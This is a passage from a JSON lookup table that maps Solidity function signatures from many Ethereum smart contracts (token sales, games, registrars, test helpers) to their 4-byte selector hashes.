"currSaleComplete()": "0x48b17b64", "ustAddress()": "0x04994883", "advisorsTotal()": "0x0cb97f57", "dividendDistributionPool()": "0x07cd401c", "_saleFinalized()": "0x9beb6c6b", "CRTSTAL_MINING_PERIOD()": "0xcee0b4fe", "FRST_CRWDSALE_RATIO()": "0xbdcefb62", "firstAuctionConcluded()": "0x5b3ddbf2", "lifeReserveTimeLock()": "0xdfe921cb", "tokensSentPresale()": "0xb630aa48", "PROMETHEUS_MAX_PRICE()": "0x238bf375", "refundStatus()": "0x9d273b20", "modelSupply()": "0x4cf127bf", "ATCController()": "0xa06aceb2", "DEVELOPMENT_FUND_LOCK_TIMESPAN()": "0x2ff6c55f", "vig()": "0x55c4a8bf", "LemonsDroppedToTheWorld()": "0x5d2cce82", "house_fee_pct()": "0xcd7eac3a", "whitelistPrincipleLockPeriod()": "0x949b56ef", "declaration()": "0xb1a6afd3", "MAX_RECEIVED_PER_PERIOD()": "0x32db8e2b", "beneficiary2()": "0xf3f2f0bc", "spectreTeam()": "0x40523946", "transfersEnabledFlag()": "0x05f9bb6b", "amountFixed()": "0x803965c4", "DEV_TEAM_PORTION()": "0x27ef89bc", "lowestContribution()": "0xe536c723", "kyc()": "0x90d6b45f", "SetEditMode()": "0x375f4498", "RadiumSupply()": "0xa578e38a", "Airdrop_Limit()": "0x459b3926", "ICO_TOKEN_SOFT_CAP()": "0x67608d38", "TEAM_VESTING_PERIOD()": "0xe559c724", "features()": "0x2b521416", "getNumItems()": "0xeaf7e325", "LongTermProjectTokensAddress()": "0xe6b18f52", "licenseCostNumerator()": "0x7978f1b2", "PotPayout()": "0x1655a451", "dateTime()": "0x48c8cd41", "RATE_FOR_WEEK2()": "0xcab47da7", "unlockSales()": "0x094c8bee", "finanVestingStages()": "0xd591d777", "TOKENS_LOCKED_2Y_TOTAL()": "0xffb00df1", "limitBranchType()": "0xb71e0120", "siteAccount()": "0xd58c4b85", "fundingLimit()": "0x7fe6eee0", "BTCValue()": "0x71245f6e", "investorsProcessed()": "0x46e1f732", "getSavedBytes()": "0x6df3edef", "cash(uint256,uint256)": "0xce5566c5", "getSavedVar()": "0x930ed251", "Bytes32Passer()": "0x1e62be25", "getSubpot(uint256)": "0x93dafba2", "getSubpotsCount(uint256)": "0x46a2679a", "getDecisionBlockNumber(uint256,uint256)": "0xdf2f0a4a", "USN(address,address,bytes,uint256,uint256,uint128)": "0x452fbc41", "calculateWinner(uint256,uint256)": "0x6572ae13", "pay(uint64,address)": "0xb1d51d31", "getIsCashed(uint256,uint256)": "0x358d5dc2", "tryRead(uint64)": "0x49cbe338", "getRoundIndex()": "0x67af1c81", "read(uint64)": "0x89b8b492", "checkOutTag(string)": "0x4c6d1d9e", "getTicketPrice()": "0x87bb7ae0", "transfer(uint64,address)": "0x7ef09476", "untag(string)": "0x35d129f6", "publish(uint64,bytes,uint64)": "0xb0de1cb7", "getBlocksPerRound()": "0x86bb7121", "setFee(uint64,uint256)": "0x21b36a08", "findTag(string)": "0x856deacf", "setDescription(uint64,bytes)": "0x268eb055", "tag(uint256,string)": "0xbb4d7cd1", "paymentNeeded(uint64)": "0x1fb6e99d", "checkOut(int256)": "0x6dd6e87b", "free(uint64)": "0x9e66cd38", "commit(bytes,string)": "0x541d920c", "isValidChannel(bytes)": "0x01da73ff", "expired(uint64)": "0x7c79ebce", "getMembers()": "0x9eab5253", "getChannelValidUntil(bytes)": "0x4c488dac", "paid(uint64)": "0x1c2f38ff", "getChannelOwner(bytes)": "0x5322f0c5", "VersionedBlob()": "0x29e94503", "expiration(uint64)": "0x1216e771", "getChannelValue(bytes)": "0x7b1cbb13", "timestamp(uint64)": "0xc0171112", "reclaim(bytes)": "0xf1c30ec0", "token(uint64)": "0xcebce72d", "fee(uint64)": "0x0fdb468f", "claim(bytes,address,uint256,uint8,bytes,bytes)": "0x60c6b3a5", "description(uint64)": "0xe86afde0", "verify(bytes,address,uint256,uint8,bytes,bytes)": "0xadf5e565", "owner(uint64)": "0x4d1f8c31", "getHash(bytes,address,uint256)": "0xcb14d93b", "createChannel()": "0x423d4ef2", "getLocked()": "0x2d49ffcd", "allNames()": "0x763a738c", "Channel()": "0x0f7d6673", "setLocked()": "0x10c1952f", "getVersions(bytes)": "0xc913b552", "empty()": "0xf2a75fe4", "getResource(bytes,uint256,bytes)": "0xdf98ef33", "emergencyWithdrawal(address)": "0x6e353a1d", "getWhatHappened()": "0x182db370", "killSwap()": "0x9cc9299e", "get(bytes,uint256)": "0x4dd49ab4", "isOOB(uint8,uint8)": "0x081bf263", "swap(address,address,uint256,uint256)": "0xfe029156", "isValidLocation(uint8,uint8,int8[5],int8[24])": "0x8d7108e5", "transferLibOwnership(bytes,address)": "0xbb963c8a", "calculateTxFee(uint256,address)": "0xfae9d06d", "blockHexCoordsValid(int8,int8)": "0x46c52b1a", "registerResource(bytes,uint256,bytes,string)": "0x6cf9cc58", "buyTile(uint8,uint8)": "0x2ef761d3", "register(bytes,uint256,address,string,uint256)": "0x4ca168cf", "getBlocks(uint8,uint8)": "0xfa93019c", "editBlock(uint8,uint8,uint256,int8[5])": "0x8cae1374", "farmTile(uint8,uint8,int8)": "0x90fd53ec", "getLastFarm(uint8,uint8)": "0x8435be4b", "setStatus(uint8,uint8,string)": "0x54385526", "getStatus(uint8,uint8)": "0xd39eb301", "setName(uint8,uint8,string)": "0x93eec1fb", "getName(uint8,uint8)": "0xa55cab95", "getCrossRate(bytes,bytes)": "0xd2d4bd72", "setOwner(uint8,uint8,address)": "0x7d5fec5a", "PriceTest()": "0xdd34e129", "getOwner(uint8,uint8)": "0xe039e4a1", "Etheria()": "0x4d9e4e22", "icapTransfer(bytes,address,bytes,uint256)": "0x922dd59a", "getAttachesto(uint8)": "0x0878bc51", "transfer(bytes,address,uint256)": "0xfde9ba41", "getOccupies(uint8)": "0x1bcf5758", "deposit(bytes)": "0x98b1e06a", "setContent(string,bytes)": "0x8bbda7e3", "setSubRegistrar(string,address)": "0xccf4f413", "setAddress(string,address)": "0x9b2ea4bd", "setName(string)": "0xc47f0027", "disown(string)": "0x01bd4051", "setOwner(string,address)": "0x092b25e9", "requiresAuction(string)": "0xff1f7046", "reserve(string)": "0xae999ece", "Registrar()": "0xb9f37c86", "bid(string,address,uint256)": "0x89cc5ea8", "onAuctionEnd(string)": "0x20620f37", "force()": "0xa79f26dc", "content(string)": "0xdd54a62f", "confirm(address,uint224,uint32,address)": "0xf509b627", "subRegistrar(string)": "0x7f445c24", "setXauForGasCurrator(address)": "0x12819817", "setWinner(uint256)": "0x0df71602", "setWeiPrice(uint256)": "0x4173b181", "setVotetUntil(uint8)": "0x7318b453", "setVoter(address)": "0x4bc2a657", "setUtils(address)": "0x69953501", "setUtils2(address)": "0x1d124fe4", "setupStackDepthLib(address)": "0x12ab7242", "_setupNoCallback()": "0xce8d054e", "setUpLimit(uint256)": "0x294f3d4d", "setupImportFee(address,uint256)": "0x92d8c8cf", "setupFee(address)": "0x26881518", "setupExportFee(address,uint256)": "0x7bc0ff20", "setUnit(uint256,uint256,uint256)": "0x468129a5", "set(uint256,address)": "0x2f30c6f6", "setUint(int256,bytes32,string,uint256)": "0x1d7b5baf", "setTrustedClient(address)": "0xacb6c69b", "setTrust(address)": "0xdd57d5c5", "setTreasury(uint256,uint256)": "0x4dc43eaf", "setTreasuryBalance(uint256)": "0xa33dd801", "setTotalSupply(uint256)": "0xf7ea7a3d", "setToS(string)": "0x506e106c", "setTOS(address,bool)": "0x55db4092", "setTokenReference(address)": "0xb33a8a11", "settle(uint256,uint256)": "0x9a9c29f6", "setTime(address,uint256)": "0xaee84f6b", "setThresold(uint256,uint256)": "0xce592586", "setThingValid(bytes32[],bool)": "0xb950556a", "setTerm(uint256,string)": "0xb1233451", "setSymbol(bytes32)": "0x49e65440", "setStartTime(uint256)": "0x3e0a322d", "setStandard(bytes32)": "0x81183633", "setSource(address)": "0xa8026912", "setServiceAccount(address,bool)": "0x09d2d0b9", "setSeedPrice(uint256)": "0xe1a9109d", "setRowcol(uint256,uint256[2])": "0x0381cb3b", "setResult(uint256,uint256,bytes32)": "0xaf030d2c", "setRequestUntil(uint8)": "0x718bd6dd", "setRegistrationPrice(uint256)": "0xe0117441", "setReferralId(uint256,address)": "0xa0a2f629", "setReceiverAddress(address)": "0x8279c7db", "setReadingDelay(uint256)": "0x50f07cf9", "setRating(bytes32,uint256)": "0x50b7b7a2", "SetRank(uint8,address,uint16)": "0xe50d0473", "setQueryFee(uint256)": "0xc24924d6", "setProxyCurrator(address)": "0x8e25071a", "setProxyContract(address)": "0x7137ed47", "setProbabilities(uint32[])": "0x6e0d98fe", "setPrizes(uint32[])": "0x53d97e65", "setPrice(uint256,uint256)": "0xf7d97577", "setPrices(uint256,uint256)": "0x05fefda7", "setPrices()": "0x5e983d08", "setPricePerStake(uint256)": "0x36f7cd70", "setPreviousID(uint256,int256)": "0x3f9f5b68", "setPrecisionDirect(uint8)": "0x2e3be78d", "setPlz(string)": "0xffe302d1", "setOwner(uint256,uint256)": "0x7acbfb65", "SetOwner(address)": "0x167d3e9c", "setOwner(address,string)": "0xd62b255b", "setOversight(address)": "0x18f3fae1", "setOraclizeGas(uint32)": "0x89ed0b30", "setOracleGas(uint256)": "0xc7e22ac4", "setOracle(address)": "0x7adbf973", "setOperationsCallGas(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x65228934", "setNumUnits(uint256,uint256)": "0x755b5b75", "setNumCities(uint256,uint256)": "0x8173b813", "setNumCities(uint256)": "0x8389f353", "setNextRegistrar(address)": "0xfc9e53df", "setNextID(uint256,int256)": "0xc4d9102f", "SetNewBigContract(address)": "0x4b3b6168", "setName(uint256,string)": "0xfe55932a", "setName(bytes32)": "0x5ac801fe", "setMsgPrice(uint256)": "0x8aa33776", "setMsg(address,uint256)": "0x29de91db", "setModule(address,bool)": "0xb1662d58", "setMin(uint256,uint256)": "0x03251a08", "setMinimumGasLimit(uint256)": "0xb0414a2d", "setMinimalRewardedBalance(uint256)": "0x35930e13", "setMeta(uint256,bytes32,bytes32)": "0xdd93890b", "setMeta(bytes32,bytes32,bytes32)": "0x91cd242d", "setMembership(address)": "0x50944a8f", "setMeltingContract(address)": "0x1ca60aeb", "setMax(uint256,uint256)": "0x3b91ceef", "setMaxProfit()": "0xee8ff562", "setMaximumCredit(uint256)": "0x5e404de3", "setMasterKey(address)": "0x457dd8b3", "setMap(uint256,uint256,uint256)": "0x73ffd969", "setLowLimit(uint256)": "0x9cb31079", "setLimit(uint256)": "0x27ea6f2b", "setLastTimestamp(uint256,uint256)": "0x74f519db", "setJurisdication(string)": "0x7f0c949c", "SetInternalValues(uint8,uint256)": "0x18f303a1", "setIntermediate(address)": "0x9fcbc738", "Set_Interest_Rate(uint256)": "0x26b916b4", "setInitialLockinDays(uint256)": "0xa8659216", "setImportFee(address,uint256)": "0xe2c61114", "setImporterBank()": "0xae2df7b3", "setImporter()": "0x1bd9c46e", "setHotwallet(address)": "0x0a3b1cd2", "setHotWallet(address)": "0x9fb755d7", "startGame(address,uint256)": "0xf399c7e6", "Example3(string)": "0xe9bbc19e", "isDspRegistered(address)": "0xbaa5eb5c", "findDsp(address)": "0x40f2a50b", "transferDSPRecord(address,address)": "0x35552dbc", "updateUrl(address,bytes32[5])": "0x954d2cfd", "unregisterDsp(address)": "0x421c0d9c", "Donator2()": "0xb4539817", "unlockTransfer(address,uint256)": "0x1ffb6ca6", "ROKToken()": "0xe0c67b9c", "doWithdraw()": "0xb011fcf1", "SaleWallet(address,uint256,address)": "0xa369bb28", "saleFinalized()": "0xa5f0dea2", "delegatedFwd(address,bytes,uint256)": "0xb9002e62", "recoverAddress(bytes32,bytes)": "0xc655d7aa", "transferUniqueId(bytes32)": "0x2e415444", "revokeKey(address)": "0x5ae7ab32", "addKey(address)": "0x5f7b68be", "hasString(string[],string)": "0xc40b276b", "setVote(address,string,uint256,address,bool)": "0x63472fad", "GetPower()": "0xc619bbd3", "TheDivine()": "0xd2415852", "StoreDocument(bytes32,string,string)": "0x4a75c0ff", "DDJXRP()": "0x10895087", "getStoreAddress(string)": "0x96d122ea", "addStore(string)": "0x662feffc", "StoreRegistry()": "0xc5c925e2", "VisibilityDerived()": "0x0b4a1ece", "testDepositUsingDeployedContract()": "0xb7b747c5", "claimEgg(uint256,bytes32,bytes32)": "0x8fa17580", "transferEgg(uint256,address)": "0x38436c60", "createEgg(string,bytes32)": "0x2d22b464", "getHistoryEntry(uint256,uint256)": "0x02ba6f8d", "getEggData(uint256)": "0x4740a08b", "getShit()": "0x38f4b734", "removeUser(address)": "0x98575188", "changeUserPerms(address,bool,bool,bool)": "0x68f2c86a", "createUser(address,string,bool,bool,bool)": "0x0bfefed4", "canTrade(address)": "0x559f05dc", "canCreate(address)": "0x7804a5dc", "eggtracker()": "0x477adb83", "getValidation(address,uint256)": "0x011721ad", "getAuthorizationDate(address,address)": "0x06aef16a", "getUsersCount()": "0xa4a1e263", "giveAuthorization(address)": "0xca3261c6", "getTerminalCount()": "0x76d83cb3", "getTerminal(uint256)": "0x8edff3db", "addTerminal(address,uint256,address)": "0x21a638d8", "getCompanyCount()": "0xf0782640", "getCompany(uint256)": "0x57d13917", "addCompany(address,string)": "0xed234e20", "DTransport()": "0xcda78dea", "finaliseContract()": "0xd768d95b", "endContract(uint256,uint256,uint8,bytes32,bytes32)": "0x4f0016d0", "PaymentChannel(address,address,uint256)": "0xa1d48aa8", "damage()": "0xa1580f1a", "reproduce(uint8,address,uint256)": "0x4de2578c", "attack(uint8)": "0x1999eca8", "harvest()": "0x4641257d", "move(uint8)": "0x70e87aaf", "set_location(uint256)": "0x78cffc09", "set_creature_builder(address)": "0x4f002522", "set_eth(uint256)": "0xfdac3a20", "set_brain(address)": "0x7593473c", "set_species(uint256)": "0x82b022e0", "set_hp(uint256)": "0x14fefca1", "withdraw_eth(uint256)": "0x30a95e67", "set_maxgasprice(uint256)": "0x6ca3b5f6", "Creature()": "0x2a43db3a", "usePrecompiledContracts(bytes32,uint8,bytes32,bytes32)": "0x5d667464", "_isVotable(bytes32)": "0x51306a80", "_score(bytes32)": "0x531efbee", "internalVote(bytes32,address,uint256,uint256)": "0xc1f1d116", "getParametersHash(uint256[12])": "0x08941307", "getRedeemableReputationStaker(bytes32,address)": "0x9ea134bf", "getRedeemableReputationVoter(bytes32,address)": "0xec22f94f", "getRedeemableTokensVoter(bytes32,address)": "0xc52cde58", "getRedeemableReputationProposer(bytes32)": "0xecd79066", "getRedeemableTokensStaker(bytes32,address)": "0xb0ea8d8f", "threshold(bytes32,address)": "0xf26f4f61", "score(bytes32)": "0xe5af18c5", "shouldBoost(bytes32)": "0x80f5e0a1", "redeem(bytes32,address)": "0xcc3bf9e9", "winningVote(bytes32)": "0x3c133818", "voteStake(bytes32,uint256)": "0x70743768", "staker(bytes32,address)": "0x8baa8b1f", "scoreThresholdParams(address)": "0x5e31005d", "proposalAvatar(bytes32)": "0xf91cb3d6", "proposalStatus(bytes32)": "0x79a1c1f6", "voteInfo(bytes32,address)": "0x119ce91b", "stake(bytes32,uint256,uint256)": "0x2daedd52", "OrganizationRegister()": "0x0f89fa28", "resolveDispute(uint256,uint256,uint256,uint256)": "0x16670bcd", "isValidator(uint64,address)": "0xbd6501b1", "getValidatorIndex(uint64,address)": "0x687981ac", "isParticipant(uint64,address)": "0x9cfa750f", "getParticipantIndex(uint64,address)": "0xc6a22681", "blockStart(uint64)": "0xed6c3e84", "hashTransfer(address,address,bytes,uint256)": "0xb69fae22", "hashState(address,uint256,uint256,uint256)": "0xbc246a36", "recoveryToString(uint256)": "0x09799ead", "toKeyValue(int256,string)": "0x00c4cefa", "toKeyValue(uint256,string)": "0xa331cd38", "toAddrString(uint256)": "0x06db8af7", "toString(int256)": "0xa322c40e", "toHexString64(uint256)": "0xa69709ae", "toHexString(uint256)": "0x8fba8d5c", "toString(uint256)": "0x6900a3ae", "getB3()": "0x03178d05", "getB2()": "0x39246290", "getB1()": "0x3f4e5ab9", "getB0()": "0x84a80c6b", "getFinalBytes()": "0x98b00ee0", "getDigit()": "0x6b590248", "convertBytes4ToArray(bytes4)": "0x849a7cb7", "Bytes4ToByteArrayWithLength4()": "0x5b5ae956", "DummyToken(string,string,uint256,uint256)": "0xee836fbc", "throwIfSetPresaleTokensAfterSaleStarts()": "0xfc4bd9d7", "testCannotSetPresaleTokensAfterSaleStarts()": "0xdea8d6b6", "throwIfSetPresaleTokensAfterActivation()": "0x3b01788a", "testCannotSetPresaleTokensAfterActivation()": "0x28ca3062", "throwsWhenTransferingPresaleTokensBeforeCliff(address)": "0x2d11fa16", "testSetPresaleTokens()": "0x053db3a9", "throwsSaleWalletIncorrectSaleAddress()": "0x8643d01d", "testThrowsSaleWalletIncorrectSaleAddress()": "0xb8f249e2", "throwsSaleWalletIncorrectMultisig()": "0xe5af3a35", "testThrowsSaleWalletIncorrectMultisig()": "0xd775db2a", "throwsSaleWalletIncorrectBlock()": "0x028b7854", "testThrowsSaleWalletIncorrectBlock()": "0x8c14db73", "throwsWhenSaleIsNotTokenController()": "0xe8dca673", "testThrowsIfSaleIsNotTokenController()": "0xacd6f096", "throwsWhenNetworkPlaceholderIsBad()": "0xe2418c15", "testThrowsIfPlaceholderIsBad()": "0xec0b3d21", "throwsWhenNonMultisigDeploysANT()": "0x9d9bfb02", "testOnlyMultisigCanDeployANT()": "0x77d821a2", "throwsWhenRedeployingANT()": "0x54fef819", "testCannotRedeployANT()": "0x27d26d6e", "throwsWhenActivatingBeforeDeployingANT()": "0x01372911", "testCannotActivateBeforeDeployingANT()": "0x3ee39cee", "testActivateSale()": "0x2efaa460", "throwIfStartPastBlocktime()": "0xcb9c8505", "testCantInitiateIncorrectSale()": "0xc7c7322b", "testCreateSale()": "0x8f5cbe36", "reveal(uint256,bytes32)": "0x4036778f", "Exercise(uint256)": "0xa2a53c7c", "secret()": "0xd1efd30d", "calculateFare(string,string)": "0x3f32af65", "AutoFareCalculator()": "0xd3a05872", "getMedications()": "0xd38f3b68", "setMedications(bool)": "0xcd6e8855", "getAllergies()": "0x8b1928a5", "setAllergies(bool)": "0x5a40bb8f", "getGeneralInfo()": "0xa34bbf51", "setGeneralInfo(bool)": "0x35d82d16", "getTokenPods(address)": "0x05ef6848", "tokenTransfer(address)": "0x8d956f1e", "mintToken(int256,address,uint256,address)": "0x23e5e822", "checkPoDs(address[])": "0x041b1406", "newProject(string,string,uint8,address[],address)": "0x1db4012d", "RICO()": "0xbbd37e37", "initWallet(address[],uint256,uint256)": "0xe46dcfeb", "initDaylimit(uint256)": "0x9da5e0eb", "initMultiowned(address[],uint256)": "0xc57c5f60", "proofFor(string)": "0xf6c1acdf", "setTimestamp(uint256)": "0xa0a2b573", "incrementTimestamp(uint256)": "0xb610c75e", "TimeControlled()": "0x596c49bd", "C()": "0x83dfe5fd", "testFee()": "0x3f77e1e9", "inResources(address,bytes4)": "0x98c5166c", "_addResources(address[],bytes4[])": "0x79a2bbec", "resourceIndex(address,bytes4)": "0x9664d2d9", "resourceDelete(address,bytes4)": "0x9ffaf32e", "queryResource()": "0x53f4a519", "inPermission(address,bytes4)": "0x19c38c66", "deleteResources(address[],bytes4[])": "0x2f8cfe0e", "addResources(address[],bytes4[])": "0x87f0bf31", "Permission(bytes32,address[],bytes4[])": "0xe0755792", "STQPreICOTestHelper(address,address)": "0x5208ce36", "registerForeignAddress(address)": "0x56768538", "registerAddress()": "0x1832425f", "addFunds(address)": "0x2a4a1a9b", "release(address)": "0x19165587", "pay(address)": "0x0c11dedd", "placeToken()": "0x595e1e20", "AirTrafficController(string,address[],address,address)": "0x2c0c6488", "setRoutePrice(uint256)": "0x1e38a011", "callInternalTransfer(address,address,uint256)": "0x387a54d9", "requiresAuction(bytes32)": "0x3af90f35", "bid(bytes32,address,uint256)": "0xc0140fd1", "onAuctionEnd(bytes32)": "0x7e577274", "newTopic(string)": "0xbbced0d0", "getTopicNameAndVotesAt(uint256)": "0xd417f18d", "getMemberName(address)": "0xaff4b849", "listTopics()": "0x6d4419e5", "getNumTopics()": "0xafbde5c9", "UnConf(string,address)": "0x67ab4381", "getReadableTime(uint256)": "0x3d3b2056", "testTransferFromDoesNotAllowTransferOfMoreThanExistingTokensByDelegate()": "0x788e7909", "testTransferFromDoesNotAllowTransferByAddressThatHasNotBeenApproved()": "0x2ea23b11", "excess_withdraw()": "0x7c62965e", "deathData_f10()": "0xfa35aa94", "rollback()": "0x9afd9d78", "tFinalized()": "0xeb5b135b", "deadlineToFreedTeamPool()": "0xadb3a3a6", "minInvestments()": "0xdd9546b1", "lastBlock_a0Hash_uint256()": "0xb5cd1821", "superContract()": "0xb04fc4e1", "wingsTokenRewards()": "0xfacce5bb", "maxPaymentInEther()": "0xe3dcd2c8", "LescovexAddr()": "0xf309782b", "distributionActive()": "0x99fb15d2", "maintenance()": "0x6c376cc5", "trickleSum()": "0x564952d5", "fightAuction()": "0xa3d07452", "minApproval()": "0x03ff90f6", "extraTokensHolder()": "0xe75bf820", "withdrawChunk()": "0x9faec927", "VECTORZILLA_RESERVE()": "0xca4e4863", "bonusMax()": "0x7aba86d2", "RESERVED_MARKETING_GROUP()": "0x290ed1be", "unofficialApplicationSignUpFee()": "0x62ee922b", "limitDateCrowdWeek1()": "0x75250e85", "presaleBonusTokensDistributed()": "0xc17a099b", "crowdsaleTokensWallet()": "0x95e396f9", "hardcapInWei()": "0xddfa53e4", "End10()": "0xbe0f6bcb", "DEFROST_PERIOD()": "0xc1615c87", "COMMISSION_PERCENTAGE()": "0x1bf1de9b", "minBuyForPrize_()": "0x94dc7cec", "transferPaused()": "0xfb2cb34e", "setupCompleteFlag()": "0x8741ab49", "chainStartBlock()": "0x032cbc5f", "newProposalEthUSDOracle()": "0xcd04ccfc", "callbackTime()": "0xf3433ff2", "icofunding()": "0x0754e744", "RLCSentToBTC()": "0x28198eab", "fixSaleCompleted()": "0xf61a7f6f", "majorPartnerAddress()": "0x05c06db9", "campaignOpen()": "0x60f5ac86", "NONE()": "0x83525394", "preSaleStart()": "0x0d5624b3", "holderReferalTokens()": "0x2bdd530b", "unlockat()": "0x57204a1d", "decimal()": "0x76809ce3", "candyTokenAddress()": "0xfc0656c9", "goldIssueBurnFee()": "0x5eb456c1", "kdtFundDeposit()": "0xf815e6ab", "payoutAddress()": "0x5b8d02d7", "sybmol()": "0xe0d9bc7b", "referralDone()": "0xd7ea39c6", "availableBuyInShares()": "0xe6bd11b2", "EXPERTS_POOL_TOKENS()": "0xcd944e3b", "getContestEndTime()": "0xb893deb1", "endOfCrowdsale()": "0x2536d7f1", "start5Phase2020()": "0xe4698ee7", "distributionEntryCount()": "0xd6ea5a0e", "DISTRIBUTION()": "0x7c91e4eb", "bnbTokenWallet()": "0x0ce4e104", "isMovingEnable()": "0xd3bdd242", "privateIcoEndTime()": "0x60b6aa92", "taxCollector()": "0xbea1dcf8", "client()": "0x109e94cf", "earlyBirdTokenRate()": "0x47e122dc", "Cst()": "0x016b0882", "issueDate()": "0x8d1343e0", "bgb_per_eos()": "0xa988df4b", "comptroller()": "0x5fe3b567", "maxUserPower()": "0x80105295", "BAD_ERC20()": "0x6fe1f6b4", "lastDifficultyAdjustmentEthereumBlock()": "0x1f6a1bf7", "albosWallet()": "0x35f64a30", "AIR_2()": "0x98d31a13", "redemptionFundTotal()": "0x9b4c7b70", "devRewardClaimed()": "0x44c526c1", "lastHour()": "0xe96bf86d", "gemDefenseConversion()": "0xc0ba6adf", "ETHER_MAX_CONTRIB_USA()": "0xe8faf89c", "timesno()": "0xed2fbf96", "daVinciAddress()": "0xc8dd64ea", "totalBattleboards()": "0xa921ba7d", "refShare()": "0x1f4fc29c", "isClose()": "0x1338f493", "End5()": "0x6b2a77ed", "totalSupplyToken()": "0x27213345", "totalSupplyIco()": "0xadb88cb9", "inmax()": "0xb03c6729", "distDay()": "0xf64b5c16", "oldE4()": "0xc741764c", "masterTokenBalanceHolder()": "0x4019fc54", "beneficiaryAddress()": "0xd9c4870e", "TripCoinTeamAddress()": "0x894d6ef9", "STARTING_TURTLE()": "0xed11a690", "InterfaceId_ERC721Metadata()": "0xbd12a007", "stageMgmtSystem()": "0x5ef572ad", "COIN_SUPPLY_COMPANY_TOTAL()": "0x489da639", "presale_price_in_wei()": "0xeaf0ded9", "lockedMonsterStatsCount()": "0x7afa0c66", "pizzaHolder()": "0x07defcac", "priceNeedsUpdate()": "0x72850e7a", "doThrowOnDivByZero()": "0x7919792b", "doNotThrowOnValidDiv()": "0xb499b2ce", "tokenReserve(address,uint256)": "0xdc29ec37", "getCurrentPeriod()": "0x086146d2", "setupPeriodForSecondStep(uint256,uint256)": "0x59bfd388", "setupPeriodForFirstStep(uint256,uint256)": "0xad4749f4", "DMarketToken(address,uint256,uint256,uint256,uint256)": "0x66f8bbe0", "setJobStatus(uint256,uint8)": "0x33d59f0a", "setJobHiringDone(uint256)": "0xa2d74b29", "approveSponsorableJob(uint256)": "0xc5d65d1a", "setJob(uint256,string,string,uint256[],uint256,uint256,uint8[],uint8,bool,address[])": "0xb5a60045", "EthlanceJob(address)": "0x89f224a8", "abstractFn(uint256)": "0x488c7951", "CuratorRules(address,address[])": "0xcf5c8b99", "requestRefund()": "0xd5cef133", "disarm()": "0x83985082", "arm()": "0x370419e5", "test_sendFundsToContract()": "0x153a6bd3", "test_contractBalance()": "0x225682d1", "Example7()": "0x7ecacb95", "create(string,address,address,address,address,bool)": "0x5f0da5c9", "burnMoney()": "0x06fd537b", "getMoney(address,uint256)": "0x35aa6c31", "getProduct(bytes32)": "0x3a20e9df", "getProductsCount()": "0x5786fd40", "setRunning(bool)": "0xdfd200c5", "buy(bytes32)": "0x9c9a1061", "buyWithTokens(bytes32)": "0x392ecfa6", "setProductStock(bytes32,uint256)": "0x8e006db0", "deleteProduct(bytes32)": "0x94727b41", "addProduct(uint256,uint256,bytes32,address)": "0x451515db", "addProductInUsd(uint256,uint256,bytes32)": "0x813b024f", "deleteProductInternal(bytes32)": "0xbad845e6", "isAllowedToken(address)": "0xcbe230c3", "Shop(uint256,address)": "0xf8d67506", "setTime(uint256,uint256,uint8)": "0xa547ec4c", "getWinningFaction()": "0xc8f98db8", "getTemporaryWinningFaction()": "0x3da06d6c", "isDraw()": "0xf84fce56", "isInProgress()": "0x6dfc2fa8", "getTotalSlaves(address)": "0x36c2d72d", "computeSlaves(address,address)": "0xa0660943", "getGreeksBattlePointsBy(address)": "0x9f0be144", "getPersiansBattlePointsBy(address)": "0xb8878171", "getGreeksBattlePoints()": "0x069f7e85", "getPersiansBattlePoints()": "0xb6469620", "getAtheniansOnTheBattlefield(address)": "0x912f6ba4", "getSpartansOnTheBattlefield(address)": "0xba53d9f3", "getImmortalsOnTheBattlefield(address)": "0x21db0f0d", "getPersiansOnTheBattlefield(address)": "0x526b8462", "sendBattleTokens(address,uint256)": "0xe83cf468", "sendWarriors(address,address,uint256)": "0xb29f2e77", "retrieveWarriors(address,address,uint8)": "0xd17cf29f", "assignWarriorsToBattle(address,address,uint256,uint256)": "0xaf0eec40", "redeemWarriors()": "0x6f3c8566", "assignAtheniansToBattle(uint256)": "0x0c8e3166", "assignSpartansToBattle(uint256)": "0xf8228f14", "assignImmortalsToBattle(uint256)": "0x3830901a", "assignPersiansToBattle(uint256)": "0xfb9ec0a8", "setBattleTokenAddress(address,address)": "0x5ef4ed42", "BattleOfThermopylae(uint256,uint256,uint8,address,address,address,address)": "0x0cf1dd6e", "invariant(address)": "0x8e0a5faa", "freeSpaceOf(address)": "0x24f743dc", "supplyOf(address)": "0x62400e4c", "removeGains(address,uint256)": "0xd9f7eacf", "addGains(address,uint256)": "0xba2aee26", "removeLocked(address,uint256)": "0x5dc1bb52", "addLocked(address,uint256)": "0xe73886b0", "removePending(address,uint256)": "0x9c544e72", "addPending(address,uint256)": "0xa279c488", "wper(uint256,uint256)": "0xd807a688", "per(uint256,uint256)": "0x91d2939d", "create(address,int256,address)": "0x2a28822e", "void()": "0xac4c25b2", "setSellerAndAmt(address,uint256)": "0xc4969b8f", "EscrowRaj()": "0xfbd22407", "BonusCrowdsale(uint256,uint256)": "0xbfd24821", "TokenHolder(address,uint256)": "0xda12e9ef", "hello(uint256)": "0xb0f0c96a", "Vault(address[],address,address[],address[])": "0x0c333556", "test_chain2_4()": "0x7dd003f1", "test_chain2_1_increaseTimeBy5000()": "0x15d494c4", "test_chain2_2_increaseBlocksBy5()": "0x93439950", "test_chain2_3()": "0x5460687c", "test_2_someTest()": "0x9ee6c0e1", "test_4_someTest()": "0x1ac5c96f", "test_1_someTest()": "0xdccb0c89", "test_3_someTest()": "0xefdea046", "accountGameResult(address,uint256)": "0x360aac67", "unlockPlayerFunds(address)": "0x8d670a2e", "lockPlayerFunds(address)": "0x0e6e4f3e", "transferToGame(address,address)": "0x13c709d4", "playerLockedFunds(address)": "0x0635fe90", "balanceOfPlayer(address)": "0x2911982e", "PlatformDeposit(address,address)": "0x2613ba9a", "updateLastPrice(uint256)": "0xd5c44898", "TestableMarketContractOraclize(string,address,address,uint256[5],string,string)": "0x03e864fa", "getSponsorableJobs()": "0x478e7d7f", "getUserSponsorships(address)": "0x779c4a26", "getJobApprovals(uint256)": "0x1922e9b4", "totalBonusToken()": "0x9d1e351c", "MigrationFund()": "0xefd73adc", "protocol()": "0x8ce74426", "dropEnd()": "0x6cf3d099", "TOKEN_PRESALE_LIMIT()": "0x54d24f33", "initialSupplyInFrac()": "0x6b0028b9", "crowdsalePause()": "0x3f174064", "tokenURIPrefix()": "0xc0ac9983", "boosterContract()": "0x27f7be99", "getMegaboxIndex()": "0x7dd26660", "renewalsCreditAffiliatesFor()": "0xe9748e58", "teamReserveTokens()": 